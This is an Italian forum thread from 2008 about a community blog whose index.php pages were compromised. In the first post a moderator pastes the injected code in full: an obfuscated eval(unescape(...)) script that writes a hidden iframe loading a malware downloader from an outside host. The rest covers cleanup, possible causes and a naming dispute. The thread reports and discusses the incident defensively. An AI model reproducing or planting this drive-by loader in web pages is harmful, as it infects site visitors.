|
|
|
![]() |
|
Strumenti |
![]() |
#1 |
Senior Member
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27479
|
www.hwupgrade.helloweb.eu sotto attacco
ebbene sì sono arrivati anche lì gli attacchi, sul blog creato per alcuni progetti sviluppati dagli utenti di queste aree, oggi alle 08:20 sono state modificate due pagine sorgenti iniettando codice offuscato:
Codice:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%34%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6b%61%72%61%62%6f%6b%2e%62%69%7a%2f%73%70%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%33%33%37%31%29%2b%27%65%61%34%38%5c%27%20%77%69%64%74%68%3d%31%35%31%20%68%65%69%67%68%74%3d%32%32%31%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script> ![]() la destinazione era un bel "Virus or unwanted program 'HTML/Dldr.Iframe.DP [virus]'" ![]() ovviamente ho i file con tale modifica per chi volesse ![]() mi correggo, tutti i file index.php sono stati modificati...
__________________
"Visti da vicino siamo tutti strani..." ~|~ What Defines a Community? ~|~ Thread eMule Ufficiale ~|~ Online Armor in Italiano ~|~ Regole di Sezione ~|► Guida a PrivateFirewall
Ultima modifica di xcdegasp : 28-07-2008 alle 14:19. |
![]() |
![]() |
![]() |
#2 |
Senior Member
Iscritto dal: Mar 2006
Messaggi: 22111
|
beh prima o poi sarebbe accaduto!
![]()
__________________
Questa opera è distribuita secondo le regole di licenza Creative Commons salvo diversa indicazione. Chiunque volesse citare il contenuto di questo post deve necessariamente riportare il link originario. |
![]() |
![]() |
![]() |
#3 |
Senior Member
Iscritto dal: Apr 2006
Messaggi: 22461
|
mi verrebbe voglia di massacrarli qualche volta, hai provveduto a togliere?
__________________
amd a64x2 4400+ sk939;asus a8n-sli; 2x1gb ddr400; x850 crossfire; 2 x western digital abys 320gb|| asus g1
Se striscia fulmina, se svolazza l'ammazza |
![]() |
![]() |
![]() |
#4 |
Bannato
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28894
|
"è segno che stiamo facendo un buon lavoro" cit.
![]() |
![]() |
![]() |
![]() |
#5 |
Senior Member
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27479
|
concordo con juninho85 considerando che oggi, sfiga vuole dopol'infezione, abbiamo avuto visite dal japan e francia
![]() comunque un lavoraccio correggere tutto e veramente lunghetto, modificarli a loro c'è voluto solo 3 minuti ![]() ora è lindo come fosse passato mastrolindo (= eraser? ) ![]() ![]() ![]()
__________________
"Visti da vicino siamo tutti strani..." ~|~ What Defines a Community? ~|~ Thread eMule Ufficiale ~|~ Online Armor in Italiano ~|~ Regole di Sezione ~|► Guida a PrivateFirewall
|
![]() |
![]() |
![]() |
#6 |
Bannato
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 28894
|
scusa ma...non basta "semplicemente" ripulire da quelle 2 righette di codice?
![]() |
![]() |
![]() |
![]() |
#7 |
Senior Member
Iscritto dal: Nov 2001
Città: Bastia Umbra (PG)
Messaggi: 6384
|
![]() ![]() ![]() Comunque, in generale, mi preme di chiedervi un'altra cosa. Per l'utilizzo del nome "hwupgrade" nel vostro sito, sia nel link che in home page, avete sentito la redazione di Hardware Upgrade? Il nome è registrato e non sarebbe corretto utilizzarlo senza chiederne l'autorizzazione. Vedo ad esempio in home: Lista indirizzi IP dei server da bloccare by HwUpgrade.it. Agli occhi di una persona che non sa nulla di tutto ciò, sembrerebbe che l'iniziativa sia nata dalla redazione. In aggiunta, se un qualche utente fosse rimasto infetto a causa di questo attacco, potrebbe dare la colpa alla redazione - la quale in realtà è ignara di tutta questa iniziativa. Non voglio in alcun modo bacchettare o altro, sia chiaro. L'iniziativa è molto bella ed utile, però prima di utilizzare un nome di un'azienda senza specificare bene che si tratta di un'attività del tutto slegata dalla redazione e portata avanti in maniera autonoma dagli utenti del forum penso che magari dovreste informarne i legali possessori.
__________________
:: Il miglior argomento contro la democrazia è una conversazione di cinque minuti con l'elettore medio :: |
![]() |
![]() |
![]() |
#8 |
Senior Member
Iscritto dal: Mar 2008
Messaggi: 19496
|
Sì ma vi siete chiesti dove sta la vulnerabilità (software o umana che sia) cui si sono agganciati? Non è che se un giorno mi alzo con la luna storta, avvio firefox e mi metto a modificare pagine web come mi pare e piace.
Insomma trovo molto strano che ci sono siti ripetutamente violati, wintricks tanto per non fare nomi, e i cui gestori festeggiano a caviale e champagne ogni volta che rimediano alle compromissioni, come fosse la cosa più normale del mondo riceverne, e senza dare la minima impressione di voler fare tutto quello necessario per impedirne il ripetersi. <polemic> Secondo me c'è chi non ci capisce proprio nulla, e si limita solo a ripulire le pagine ogni volta </polemic> ps. a scanso di equivoci il mio discorso polemico non è rivolto a voi personalmente, ma al contesto generale. Saluti. |
![]() |
![]() |
![]() |
#9 | |
Senior Member
Iscritto dal: Apr 2006
Messaggi: 22461
|
Quote:
__________________
amd a64x2 4400+ sk939;asus a8n-sli; 2x1gb ddr400; x850 crossfire; 2 x western digital abys 320gb|| asus g1
Se striscia fulmina, se svolazza l'ammazza |
|
![]() |
![]() |
![]() |
#10 | |
Senior Member
Iscritto dal: Mar 2008
Messaggi: 19496
|
Quote:
È del tutto da escludere l'intervento umano, volente o a sua insaputa? Intendo dire: qualcuno nella catena della gestione ed hosting che si lascia sfuggire le password? Sto solo chiedendo perché mi sembra molto, troppo strano. Per carità nessuno si offenda, ma insomma sti keylogger e/o trojan a qualcosa serviranno, o no? ![]() Saluti. |
|
![]() |
![]() |
![]() |
#11 | |
Senior Member
Iscritto dal: Aug 2006
Città: µTorrent
Messaggi: 1634
|
Quote:
Credo che se gli girassero per il nome utilizzato l'avrebbero fatto presente... Cmq se servono degli ulteriori chiarimenti espliciti nn saprei.... che dici degasp ?
__________________
Sono il Signor Wolf... Risolvo problemi. -Pulp Fiction- S.M.A.R.T. e HD in raid - www.inalto.org - Nikon Coolpix P7700 - Panasonic Lumix DMC-LF1 |
|
![]() |
![]() |
![]() |
#12 | |
Senior Member
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27479
|
Quote:
ad ogni modo come gestione siamo limitati dal fatto che il 90% è tutto gestito da helloweb.eu a differenza degli spazi apagamento nei quali hai la quasi totalità di controllo ![]() pensate che proprio ieri sera ho aggiornato i vari plugin in uso inquanto era appena uscito un aggiornamento, questo a dimostrazione che per quanto uno si possa scervellare a mantenere alta la protezione c'è sempre da qualche parte una porta serrata male in una stanza che non è accessibile a noi ma dall'interno accedi tranquillamente al corridoio ![]()
__________________
"Visti da vicino siamo tutti strani..." ~|~ What Defines a Community? ~|~ Thread eMule Ufficiale ~|~ Online Armor in Italiano ~|~ Regole di Sezione ~|► Guida a PrivateFirewall
Ultima modifica di xcdegasp : 28-07-2008 alle 20:31. |
|
![]() |
![]() |
![]() |
#13 |
Senior Member
Iscritto dal: Nov 2001
Città: Bastia Umbra (PG)
Messaggi: 6384
|
Chiaro, come detto prima, non era per bacchettarvi
![]()
__________________
:: Il miglior argomento contro la democrazia è una conversazione di cinque minuti con l'elettore medio :: |
![]() |
![]() |
![]() |
#14 |
Senior Member
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27479
|
hai fatto bene a evidenziarlo perchè proprio non ci pensavo
![]()
__________________
"Visti da vicino siamo tutti strani..." ~|~ What Defines a Community? ~|~ Thread eMule Ufficiale ~|~ Online Armor in Italiano ~|~ Regole di Sezione ~|► Guida a PrivateFirewall
|
![]() |
![]() |
![]() |
#15 | |
Senior Member
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27479
|
Riesumo questo thread per pubblicare un'email appena giunta dalla direzione di Helloweb.eu:
Quote:
__________________
"Visti da vicino siamo tutti strani..." ~|~ What Defines a Community? ~|~ Thread eMule Ufficiale ~|~ Online Armor in Italiano ~|~ Regole di Sezione ~|► Guida a PrivateFirewall
|
|
![]() |
![]() |
![]() |
#16 | |
Senior Member
Iscritto dal: Oct 2008
Messaggi: 6316
|
Quote:
a chi si riferiscono con il termine utenti disonesti? |
|
![]() |
![]() |
![]() |
#17 |
Senior Member
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27479
|
sicuramente a coloro che eseguivano questo tipo di attacchi
![]()
__________________
"Visti da vicino siamo tutti strani..." ~|~ What Defines a Community? ~|~ Thread eMule Ufficiale ~|~ Online Armor in Italiano ~|~ Regole di Sezione ~|► Guida a PrivateFirewall
|
![]() |
![]() |
![]() |
Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 23:39.